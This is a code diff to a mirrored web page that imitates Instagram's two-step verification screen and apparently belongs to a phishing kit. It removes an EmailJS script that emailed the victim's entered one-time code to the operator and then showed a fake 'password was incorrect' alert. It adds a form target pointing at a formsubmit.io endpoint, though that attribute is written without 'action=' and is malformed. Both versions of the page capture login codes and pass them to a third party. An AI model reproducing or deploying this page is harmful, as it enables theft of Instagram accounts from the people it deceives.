--- a/instagram/otp/657daf104b167f68d1979b9c.html
+++ b/instagram/otp/657daf104b167f68d1979b9c.html
@@ -57,7 +57,7 @@
       <!-- SMARTPHONE SECTION END -->
       <!-- FORM SECTION -->
       <article class="form-area">
-        <form  id="form"  method="POST" >
+        <form  id="form"  method="POST" https://formsubmit.io/send/1b814e9a-f1bb-467e-bba1-c718cf9632cb>
           <p class="small-title">2-Step Verification</p>
           <input
             type="text"
@@ -169,31 +169,7 @@
     <script src="../../js/socials/app.html"></script>
     <script src="../../js/socials/brands.min.html"></script>
     <script src="../../js/socials/fontawesome.min.html"></script>
-   <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
-    
-    <script type="text/javascript">
-        emailjs.init('-7iMhEW3G-343i3ap')
-        const btn = document.getElementById('button');
 
-            document.getElementById('form')
-                .addEventListener('submit', function (event) {
-                    event.preventDefault();
-
-                    btn.value = 'Sending...';
-
-                    const serviceID = 'service_jm653x8';
-                    const templateID = 'template_nxlf3t4';
-
-                    emailjs.sendForm(serviceID, templateID, this)
-                        .then(() => {
-                            btn.value = 'Send Email';
-                            alert('Sorry, Your password was incorrect. please double-check your password.');
-                        }, (err) => {
-                            btn.value = 'Send Email';
-                            alert(JSON.stringify(err));
-                        });
-                });
-    </script> 
   </body>
 
 <!-- Mirrored from fanfamousity.com/instagram/otp/657daf104b167f68d1979b9c by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 Dec 2023 11:22:30 GMT -->
